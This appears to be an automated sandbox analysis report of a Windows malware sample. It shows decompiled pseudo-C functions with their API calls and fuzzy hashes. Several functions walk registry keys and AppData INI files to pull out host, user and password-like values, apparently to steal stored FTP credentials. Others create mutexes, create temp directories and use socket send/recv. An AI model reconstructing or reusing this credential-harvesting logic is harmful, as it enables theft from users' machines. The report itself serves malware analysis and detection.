    				_v14 = _v14 ^ _t24 >> 0x00000010;
    				_t41 = 0;
    				_t26 = 0;
    				do {
    					_t10 = _t26 + 0xc; // 0x423be0
    					 *(_t47 + _t41 - 8) =  *(_t47 + _t41 - 8) ^  *(_t47 + _t10);
    					_t26 = _t26 + 1;
    					if(_t26 == 4) {
    						_t26 = 0;
    					}
    					_t41 = _t41 + 1;
    				} while (_t41 < 8);
    				if(_a12 != 0) {
    					E00406EC1( &_v284, _a12, 0x102);
    					E00408301( &_v284, _t41,  &_v20, 0x10);
    				}
    				_t28 = _a16 & 0x000000ff;
    				if(_t28 != 0) {
    					_t30 = _t28 - 1;
    					if(_t30 == 0) {
    						_t42 = L"Local\\";
    						_push(6);
    						goto L11;
    					} else {
    						if(_t30 == 1) {
    							_t42 = L"Global\\";
    							_push(7);
    							L11:
    							_pop(_t46);
    							E00407226(_t46, _t42, _t45);
    							_t45 = _t45 + _t46 * 2;
    						}
    					}
    				}
    				_t29 =  &_v20;
    				__imp__StringFromGUID2(_t29, _t45, 0x28);
    				return _t29;
    			}

    APIs
    • StringFromGUID2.OLE32(00000000,?,00000028,00412EC2,?,00000010,00000000,77E49EB0), ref: 0040B57F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: FromString
    • String ID: Global\$Local\$;B
    • API String ID: 1694596556-4134033513
    • Opcode ID: e61190de77119042c766145c21aa93403aa5197c43ce3ffca9266a9beb16b272
    • Instruction ID: 01b90f58167b147092af1e5f74f47e7942fe8303c30a6ad3348b0d7ad8f56d2e
    • Opcode Fuzzy Hash: e61190de77119042c766145c21aa93403aa5197c43ce3ffca9266a9beb16b272
    • Instruction Fuzzy Hash: 7F11D33161021D76CB14EA749C46BEF3669EB84718F00487BE642F61C2DB78D545C798
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • recv.WS2_32(?,?,00000400,00000000), ref: 0040A0CA
    • send.WS2_32(?,?,00000000,00000000), ref: 0040A0E4
    • select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 0040A121
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: recvselectsend
    • String ID: BAA
    • API String ID: 3514348486-1692831742
    • Opcode ID: 7af4f63d6b245769a6f83c6002ac69b70b833789f3732db2dc9a4bfefb05f1ee
    • Instruction ID: e3d4dbd0b5512c811717bb275af4da5413865935b36292ef6e799f9a055dcdf4
    • Opcode Fuzzy Hash: 7af4f63d6b245769a6f83c6002ac69b70b833789f3732db2dc9a4bfefb05f1ee
    • Instruction Fuzzy Hash: 06114CB181022CDBDB20DF25DC84ADE7BB8FF49344F20447AF929E6251D2349995CFA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040D9C1(void* __edx) {
    				void _v108;
    				char _v120;
    				char _v212;
    				long _v216;
    				char _v224;
    				void* __esi;
    				void* _t8;
    				void* _t16;
    
    				_t16 = __edx;
    				_t8 = GetThreadDesktop(GetCurrentThreadId());
    				if(_t8 != 0) {
    					_t8 = GetUserObjectInformationW(_t8, 2,  &_v108, 0x64,  &_v216);
    					if(_t8 != 0 && _v216 == 0x4e) {
    						E00412E8D(0x2937498d,  &_v212, 0);
    						_t8 = E00406EF6( &_v224,  &_v120, 0x4c);
    						if(_t8 == 0) {
    							_t8 = E0040D5CF( &_v120, _t16, 0x4231b8, _t8);
    							if(_t8 == 0) {
    								_t8 = E0040D83A(0x4231b8, 0);
    							} else {
    								 *0x423968 =  *0x423968 | 0x00000004;
    							}
    						}
    					}
    				}
    				return _t8;
    			}

    APIs
    • GetCurrentThreadId.KERNEL32 ref: 0040D9CE
    • GetThreadDesktop.USER32(00000000), ref: 0040D9D5
    • GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 0040D9EE
      • Part of subcall function 0040D5CF: TlsAlloc.KERNEL32(004231B8,00000000,0000018C,00000000,00000000), ref: 0040D5E8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Thread$AllocCurrentDesktopInformationObjectUser
    • String ID: N
    • API String ID: 454308152-1130791706
    • Opcode ID: 0f629252020cd7f76892a2f868443aac1dbe95d9d994d70c1d7fccd809677395
    • Instruction ID: 1c47e606b4b6456df72484a55138eb678d4eb6f8ef597733ed7407afa94f563b
    • Opcode Fuzzy Hash: 0f629252020cd7f76892a2f868443aac1dbe95d9d994d70c1d7fccd809677395
    • Instruction Fuzzy Hash: 67018871A04300ABE610EBA5DD06FA7379D5B84718F00413AB659B25D0EBB8D909CA5A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040C48C(WCHAR* _a4) {
    				signed int _t4;
    				short _t9;
    				signed short _t10;
    				WCHAR* _t11;
    				WCHAR* _t12;
    				int _t18;
    
    				_t12 = _a4;
    				_t9 = 0;
    				_t11 = PathSkipRootW(_t12);
    				if(_t11 == 0) {
    					_t11 = _t12;
    				}
    				while(1) {
    					_t4 =  *_t11 & 0x0000ffff;
    					if(_t4 == 0x5c || _t4 == 0x2f || _t4 == 0) {
    						goto L5;
    					}
    					L11:
    					_t11 =  &(_t11[1]);
    					continue;
    					L5:
    					_t10 = _t4;
    					 *_t11 = 0;
    					if(GetFileAttributesW(_t12) == 0xffffffff) {
    						_t18 = CreateDirectoryW(_t12, 0);
    					}
    					if(_t18 == 0) {
    						L13:
    						return _t9;
    					} else {
    						if(_t10 == 0) {
    							_t9 = 1;
    							goto L13;
    						}
    						 *_t11 = _t10;
    						goto L11;
    					}
    				}
    			}

    APIs
    • PathSkipRootW.SHLWAPI(?,.exe,00000000,?,00000000,0041640A,?,?,?,?,?), ref: 0040C497
    • GetFileAttributesW.KERNEL32(?,?,00000000,0041640A,?,?,?,?,?), ref: 0040C4BF
    • CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0041640A,?,?,?,?,?), ref: 0040C4CD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AttributesCreateDirectoryFilePathRootSkip
    • String ID: .exe
    • API String ID: 4231520044-4119554291
    • Opcode ID: 30d2ca4e508780e5b6a2a06e1992aa803ca3e272bf9a7735cc5b3fe25cbd1a64
    • Instruction ID: 9049e3a1fbae738a6b1703180ac3eec5449e3fe5019c118214248ff4a113d21f
    • Opcode Fuzzy Hash: 30d2ca4e508780e5b6a2a06e1992aa803ca3e272bf9a7735cc5b3fe25cbd1a64
    • Instruction Fuzzy Hash: 3BF02232140200EAD6300F290DA46777398BEA17A0B660B37EC90F33E0DA389C40827C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E0040C28A(WCHAR* _a4) {
    				short _v524;
    				char _v1044;
    				void* __edi;
    				void* _t11;
    				void* _t19;
    				void* _t20;
    
    				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
    					L6:
    					return 0;
    				}
    				_t19 = 0;
    				while(1) {
    					_push(E004081BE());
    					_push(L"tmp");
    					_t18 =  &_v1044;
    					_t11 = E00407B78(_t10, 0x104,  &_v1044, L"%s%08x");
    					_t20 = _t20 + 0xc;
    					if(_t11 == 0xffffffff) {
    						goto L6;
    					}
    					if(E0040C70A(_t18, _a4,  &_v524) == 0 || CreateDirectoryW(_a4, 0) == 0) {
    						_t19 = _t19 + 1;
    						if(_t19 < 0x64) {
    							continue;
    						}
    						goto L6;
    					} else {
    						return 1;
    					}
    				}
    				goto L6;
    			}

    APIs
    • GetTempPathW.KERNEL32(000000F6,?), ref: 0040C2A1
      • Part of subcall function 004081BE: GetTickCount.KERNEL32 ref: 004081BE
      • Part of subcall function 0040C70A: PathCombineW.SHLWAPI(?,)A,?,00412909,?,?), ref: 0040C729
    • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 0040C2F3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Path$CombineCountCreateDirectoryTempTick
    • String ID: %s%08x$tmp
    • API String ID: 1218007593-1196434543
    • Opcode ID: c84471fab4558b353e01fe296ca2dba3525030606b35f410de4c8cdffa9169d3
    • Instruction ID: 12095dfc34da09a0661415c5aec57c7a61d0110a29d7891e8ae128f0a209de75
    • Opcode Fuzzy Hash: c84471fab4558b353e01fe296ca2dba3525030606b35f410de4c8cdffa9169d3
    • Instruction Fuzzy Hash: F6F044B2500218A7CA2067608C89BEF33589B41354F204273FE51F21E1C6788DC6DA9D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040868C(void* __ecx) {
    				signed int _v8;
    				struct HINSTANCE__* _t7;
    
    				_v8 = _v8 & 0x00000000;
    				_t7 = GetModuleHandleW(L"kernel32.dll");
    				if(_t7 == 0) {
    					L4:
    					return _t7 & 0xffffff00 | _v8 != 0x00000000;
    				} else {
    					_t7 = GetProcAddress(_t7, "IsWow64Process");
    					if(_t7 == 0) {
    						goto L4;
    					} else {
    						_t7 = _t7->i(0xffffffff,  &_v8);
    						if(_t7 != 0) {
    							goto L4;
    						} else {
    							return 0;
    						}
    					}
    				}
    			}

    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0041277F,00000000,00412CA6), ref: 00408699
    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004086A9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: IsWow64Process$kernel32.dll
    • API String ID: 1646373207-3024904723
    • Opcode ID: 6955bc413d98553728bce404bd2049e4d78f9975bbd523fa6a7063b3c6f5eb07
    • Instruction ID: 5aa98a578e9e261dd090957b2479961d77da9e30dbe8e48fec594bb37412b45a
    • Opcode Fuzzy Hash: 6955bc413d98553728bce404bd2049e4d78f9975bbd523fa6a7063b3c6f5eb07
    • Instruction Fuzzy Hash: 87E04F70250205BBEF0097A59F0AF6F73A89B517D9F2546BDA011F22E0EFB8DA14952C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041C4BF(intOrPtr _a4, intOrPtr _a12) {
    				void* __esi;
    				void* _t6;
    				signed int _t7;
    
    				if(_a12 == 0x64 || _a12 == 0x33) {
    					EnterCriticalSection(0x424004);
    					_t7 = E0041BE86(_a4);
    					if(_t7 != 0xffffffff) {
    						_t7 = SetEvent( *(_t7 * 0x24 +  *0x42401c + 4));
    					}
    					LeaveCriticalSection(0x424004);
    					return _t7;
    				}
    				return _t6;
    			}

    APIs
    • EnterCriticalSection.KERNEL32(00424004), ref: 0041C4D5
    • SetEvent.KERNEL32(?), ref: 0041C4F6
    • LeaveCriticalSection.KERNEL32(00424004), ref: 0041C4FD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterEventLeave
    • String ID: 3
    • API String ID: 3094578987-1842515611
    • Opcode ID: 5418bf1c34a970e43d33bccf63eef3d25c5895d6b75b367a9d59cbcd143eb95f
    • Instruction ID: be7807d9b72e9b3771c61d8ae6f8fa5805568c06e81b5af38ab4d693f4541d2e
    • Opcode Fuzzy Hash: 5418bf1c34a970e43d33bccf63eef3d25c5895d6b75b367a9d59cbcd143eb95f
    • Instruction Fuzzy Hash: AAE09231104100EFC7206B25AC888AB7764EBD5335701C53EF11AF2170C738D892DE2E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E004190D8(char* __ecx, void* __edx, void* __eflags) {
    				void* _v8;
    				signed int _v12;
    				intOrPtr _v16;
    				int _v20;
    				int _v24;
    				intOrPtr _v28;
    				char _v32;
    				char* _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				char _v68;
    				char _v88;
    				char _v108;
    				char _v132;
    				char _v172;
    				short _v260;
    				short _v780;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t65;
    				intOrPtr _t92;
    				int _t104;
    				void* _t110;
    				intOrPtr _t112;
    				void* _t115;
    				int _t120;
    				void* _t125;
    				void* _t132;
    				void* _t135;
    				void* _t136;
    
    				_t119 = __edx;
    				_t118 = __ecx;
    				_t120 = 0;
    				E00406F38( &_v32,  &_v32, 0, 8);
    				_t65 = E00406E55(0xc1c);
    				_v16 = _t65;
    				if(_t65 == 0) {
    					L22:
    					if(_v28 <= _t120) {
    						return E00406E85(_v32);
    					}
    					return E00416CBC(_t119, _v32, 0xcb);
    				} else {
    					_v36 = _t65 + 0x3fc;
    					_v48 = 0x80000001;
    					_v44 = 0x80000002;
    					E00405B00(0x8a,  &_v260);
    					E00405B00(0x8b,  &_v88);
    					E00405B00(0x8c,  &_v132);
    					E00405B00(0x8d,  &_v68);
    					E00405B00(0x8e,  &_v108);
    					_v12 = 0;
    					do {
    						if(RegOpenKeyExW( *(_t135 + _v12 * 4 - 0x2c),  &_v260, _t120, 8,  &_v8) != 0) {
    							goto L20;
    						}
    						_v24 = _t120;
    						_v20 = 0x104;
    						if(RegEnumKeyExW(_v8, _t120,  &_v780,  &_v20, _t120, _t120, _t120, _t120) != 0) {
    							L19:
    							RegCloseKey(_v8);
    							goto L20;
    						} else {
    							goto L4;
    						}
    						L17:
    						_v20 = 0x104;
    						if(RegEnumKeyExW(_v8, _v24,  &_v780,  &_v20, 0, 0, 0, 0) == 0) {
    							L4:
    							_t122 = _v16;
    							_v24 = _v24 + 1;
    							_t92 = E0040AFA9(_v8, _t118, _v16,  &_v780,  &_v88, 0xff);
    							_v40 = _t92;
    							if(_t92 != 0xffffffff && _t92 != 0) {
    								_t132 = E0040AFA9(_v8, _t118, _t122 + 0x1fe,  &_v780,  &_v68, 0xff);
    								if(_t132 != 0xffffffff && _t132 != 0) {
    									_t124 = _v36;
    									_t104 = E0040AFA9(_v8, _t118, _v36,  &_v780,  &_v108, 0xff);
    									_v20 = _t104;
    									if(_t104 != 0xffffffff && _t104 != 0 && E0041901E(_t119, _t124, _t132 + _v40) > 0) {
    										_t125 = E0040B05F(_v8, _t118,  &_v780,  &_v132);
    										if(_t125 < 1 || _t125 > 0xffff) {
    											_t125 = 0x15;
    										}
    										_t134 =  &_v172;
    										_t110 = 0x55;
    										E00405B00(_t110,  &_v172);
    										_t112 = _v16;
    										_t118 = _v36;
    										_push(_t125);
    										_push(_t112);
    										_push(_t118);
    										_push(_t112 + 0x1fe);
    										_t119 = 0x311;
    										_t126 = _t118 + 0x1fe;
    										_t115 = E00407B78(_t134, 0x311, _t118 + 0x1fe, _t134);
    										_t136 = _t136 + 0x14;
    										if(_t115 > 0) {
    											_t118 =  &_v32;
    											if(E00407279(_t115,  &_v32, _t126) != 0) {
    												_v28 = _v28 + 1;
    											}
    										}
    									}
    								}
    							}
    							goto L17;
    						} else {
    							_t120 = 0;
    							goto L19;
    						}
    						L20:
    						_v12 = _v12 + 1;
    					} while (_v12 < 2);
    					E00406E85(_v16);
    					goto L22;
    				}
    			}

    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 0041917E
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 004191A9
    • RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 004192DF
      • Part of subcall function 0040AFA9: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00413CB1,?,?,00000104,.exe,00000000), ref: 0040AFBE
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 004192CC
      • Part of subcall function 0040AFA9: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00413CB1,?,?,00000104), ref: 0040B03F
      • Part of subcall function 0040B05F: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0041C096,?,?), ref: 0040B077
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Open$Enum$CloseEnvironmentExpandStrings
    • String ID:
    • API String ID: 2343474859-0
    • Opcode ID: 117492efded0cd78d0230f3ed43cdd9a8c02b29fbf8a94dc3de29487422afe26
    • Instruction ID: ed80c876cb093f7161c0c67ba62946e9932b22c6b5c05f5abd05f6927040e911
    • Opcode Fuzzy Hash: 117492efded0cd78d0230f3ed43cdd9a8c02b29fbf8a94dc3de29487422afe26
    • Instruction Fuzzy Hash: BB515C72D00219ABDB10EB95CD55AEFB7BCEB48304F100576E915F3291DB38AE858B64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0041966C(char* __ecx, void* __eflags) {
    				void* _v8;
    				int _v12;
    				intOrPtr _v16;
    				int* _v20;
    				intOrPtr _v24;
    				char _v28;
    				char* _v32;
    				char _v40;
    				char _v52;
    				char _v64;
    				char _v76;
    				char _v116;
    				short _v180;
    				short _v700;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t55;
    				int _t81;
    				int _t89;
    				int _t93;
    				void* _t99;
    				intOrPtr _t101;
    				void* _t104;
    				int* _t109;
    				char* _t113;
    				void* _t114;
    				void* _t122;
    
    				_t107 = __ecx;
    				_t109 = 0;
    				E00406F38( &_v28,  &_v28, 0, 8);
    				_t55 = E00406E55(0xc1c);
    				_v16 = _t55;
    				if(_t55 == 0) {
    					return _t55;
    				}
    				_v32 = _t55 + 0x3fc;
    				E00405B00(0x97,  &_v180);
    				E00405B00(0x98,  &_v64);
    				E00405B00(0x99,  &_v76);
    				E00405B00(0x9a,  &_v52);
    				E00405B00(0x9b,  &_v40);
    				if(RegOpenKeyExW(0x80000001,  &_v180, 0, 8,  &_v8) != 0) {
    					L20:
    					E00406E85(_v16);
    					if(_v24 <= _t109) {
    						return E00406E85(_v28);
    					}
    					return E00416CBC(0x311, _v28, 0xcb);
    				}
    				_v20 = 0;
    				_v12 = 0x104;
    				if(RegEnumKeyExW(_v8, 0,  &_v700,  &_v12, 0, 0, 0, 0) != 0) {
    					L19:
    					RegCloseKey(_v8);
    					goto L20;
    				} else {
    					do {
    						_t111 = _v16;
    						_v20 = _v20 + 1;
    						_t81 = E0040AFA9(_v8, _t107, _v16,  &_v700,  &_v64, 0xff);
    						_v12 = _t81;
    						if(_t81 != 0xffffffff && _t81 != 0) {
    							_t89 = E0040AFA9(_v8, _t107, _t111 + 0x1fe,  &_v700,  &_v52, 0xff);
    							_v12 = _t89;
    							if(_t89 != 0xffffffff && _t89 != 0) {
    								_t113 = _v32;
    								_t93 = E0040AFA9(_v8, _t107, _t113,  &_v700,  &_v40, 0xff);
    								_v12 = _t93;
    								if(_t93 != 0xffffffff && _t93 != 0) {
    									_t107 = _t113;
    									if(E004079D4(_t113) > 0) {
    										_t114 = E0040B05F(_v8, _t107,  &_v700,  &_v76);
    										if(_t114 < 1 || _t114 > 0xffff) {
    											_t114 = 0x15;
    										}
    										_t121 =  &_v116;
    										_t99 = 0x55;
    										E00405B00(_t99,  &_v116);
    										_t101 = _v16;
    										_t107 = _v32;
    										_push(_t114);
    										_push(_t101);
    										_push(_t107);
    										_push(_t101 + 0x1fe);
    										_t115 = _t107 + 0x1fe;
    										_t104 = E00407B78(_t121, 0x311, _t107 + 0x1fe, _t121);
    										_t122 = _t122 + 0x14;
    										if(_t104 > 0) {
    											_t107 =  &_v28;
    											if(E00407279(_t104,  &_v28, _t115) != 0) {
    												_v24 = _v24 + 1;
    											}
    										}
    									}
    								}
    							}
    						}
    						_v12 = 0x104;
    					} while (RegEnumKeyExW(_v8, _v20,  &_v700,  &_v12, 0, 0, 0, 0) == 0);
    					_t109 = 0;
    					goto L19;
    				}
    			}

    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 004196FA
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 00419725
    • RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 0041985C
      • Part of subcall function 0040AFA9: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00413CB1,?,?,00000104,.exe,00000000), ref: 0040AFBE
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 00419849
      • Part of subcall function 0040AFA9: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00413CB1,?,?,00000104), ref: 0040B03F
      • Part of subcall function 0040B05F: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0041C096,?,?), ref: 0040B077
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Open$Enum$CloseEnvironmentExpandStrings
    • String ID:
    • API String ID: 2343474859-0
    • Opcode ID: b8c4b6bb3c83c92fa85b426b6aa8d77cc17e8a23a626f4f138eaca3b05bfa07e
    • Instruction ID: 76db51410cfb4ee43092d43bf76b0bc49cfbdc2ecb2797407afaa6d1cfee8bde
    • Opcode Fuzzy Hash: b8c4b6bb3c83c92fa85b426b6aa8d77cc17e8a23a626f4f138eaca3b05bfa07e
    • Instruction Fuzzy Hash: F5513BB2910109AADB10EBA5CD45AEFB7BCEF45304F100176F915F3291DB38AE85CBA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E004144F1(void* __eflags, intOrPtr _a4) {
    				signed int _v5;
    				short _v20;
    				char _v40;
    				char _v60;
    				short _v84;
    				char _v112;
    				char _v144;
    				short _v664;
    				char _v1184;
    				short _v1704;
    				char _v2224;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t31;
    				long _t33;
    				void* _t36;
    				void* _t42;
    				void* _t44;
    				void* _t46;
    				long _t50;
    				short* _t58;
    				char* _t65;
    				short _t66;
    				void* _t67;
    				WCHAR* _t70;
    				long _t77;
    
    				_t31 = 0x2a;
    				E00405B00(_t31,  &_v144);
    				_t33 =  &_v1184;
    				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t33);
    				if(_t33 == 0) {
    					_t33 = E0040C70A( &_v144,  &_v1184,  &_v1184);
    					if(_t33 != 0) {
    						_t36 = 0x2c;
    						E00405B00(_t36,  &_v112);
    						_t33 = E0040C70A( &_v112,  &_v1704,  &_v1184);
    						if(_t33 != 0) {
    							_t33 = GetFileAttributesW( &_v1704);
    							if(_t33 != 0xffffffff) {
    								_t42 = 0x2d;
    								E00405B00(_t42,  &_v60);
    								_t44 = 0x2e;
    								E00405B00(_t44,  &_v84);
    								_t46 = 0x2f;
    								E00405B00(_t46,  &_v20);
    								_v5 = 0;
    								while(1) {
    									_push(_v5 & 0x000000ff);
    									_push( &_v60);
    									_t67 = 0xa;
    									_t70 =  &_v40;
    									_t50 = E00407B78( &_v60, _t67, _t70);
    									if(_t50 < 1) {
    										break;
    									}
    									_t50 = GetPrivateProfileIntW(_t70,  &_v84, 0xffffffff,  &_v1704);
    									_t77 = _t50;
    									if(_t77 == 0xffffffff) {
    										break;
    									}
    									_t50 = GetPrivateProfileStringW(_t70,  &_v20, 0,  &_v664, 0x104,  &_v1704);
    									if(_t50 == 0) {
    										L17:
    										_v5 = _v5 + 1;
    										if(_v5 < 0xfa) {
    											continue;
    										}
    										break;
    									}
    									_t58 =  &_v664;
    									if(_v664 == 0) {
    										L12:
    										if(_t77 != 1) {
    											_t65 =  &_v664;
    											L16:
    											_t50 = E00414678(0, _t65, _a4, _t90);
    											if(_t50 == 0) {
    												break;
    											}
    											goto L17;
    										}
    										_t50 = E0040C70A( &_v664,  &_v2224,  &_v1184);
    										_t90 = _t50;
    										if(_t50 == 0) {
    											goto L17;
    										}
    										_t65 =  &_v2224;
    										goto L16;
    									} else {
    										goto L9;
    									}
    									do {
    										L9:
    										if( *_t58 == 0x2f) {
    											_t66 = 0x5c;
    											 *_t58 = _t66;
    										}
    										_t58 = _t58 + 2;
    									} while ( *_t58 != 0);
    									goto L12;
    								}
    								return _t50;
    							}
    						}
    					}
    				}
    				return _t33;
    			}

    APIs
    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 00414518
      • Part of subcall function 0040C70A: PathCombineW.SHLWAPI(?,)A,?,00412909,?,?), ref: 0040C729
    • GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0041456C
    • GetPrivateProfileIntW.KERNEL32 ref: 004145CF
    • GetPrivateProfileStringW.KERNEL32 ref: 004145FB
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: PathPrivateProfile$AttributesCombineFileFolderString
    • String ID:
    • API String ID: 1702184609-0
    • Opcode ID: e8b8b75637097500d49e9180d47f29306a8da97e8b58f6a238525ee32d0b05b2
    • Instruction ID: 21005c6c9718e13f74b1c85aa2558ca96333db04c82fa42b0ecafbea02b0b1d3
    • Opcode Fuzzy Hash: e8b8b75637097500d49e9180d47f29306a8da97e8b58f6a238525ee32d0b05b2
    • Instruction Fuzzy Hash: 81418E72900218AADF20EBA48C49FDF737DAB46318F5041A7F604F7191D778AE89CB59
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CoCreateInstance.OLE32(004015B0,00000000,00004401,004015A0,?), ref: 0040D33E
    • VariantInit.OLEAUT32(?), ref: 0040D38A
    • SysAllocString.OLEAUT32(?), ref: 0040D39A
    • VariantClear.OLEAUT32(?), ref: 0040D3D3
    Memory Dump Source
    • Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Variant$AllocClearCreateInitInstanceString
    • String ID:
    • API String ID: 3126708813-0
    • Opcode ID: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
    • Instruction ID: 1313d04ffc97f138a8e72153f7349ac692d5069025d6b63466d08f6d5b18d84d
    • Opcode Fuzzy Hash: 825154fbe07c9436ff7aca48b55201353bca4e2e0da95a753cfabf15d89ce18c
    • Instruction Fuzzy Hash: 67216D70900224AFCB109BE5CCC8FEF7BB8AF09750F0445B5F906EA2D1D6759904CBA6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040CE3C(signed int __edx, void** __esi, void* _a4, signed int _a8) {
    				char _v5;
    				long _v12;
    				void _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _t26;
    				signed int _t29;
    				signed int _t46;
    				void** _t48;
    
    				_t48 = __esi;
    				_t46 = __edx;
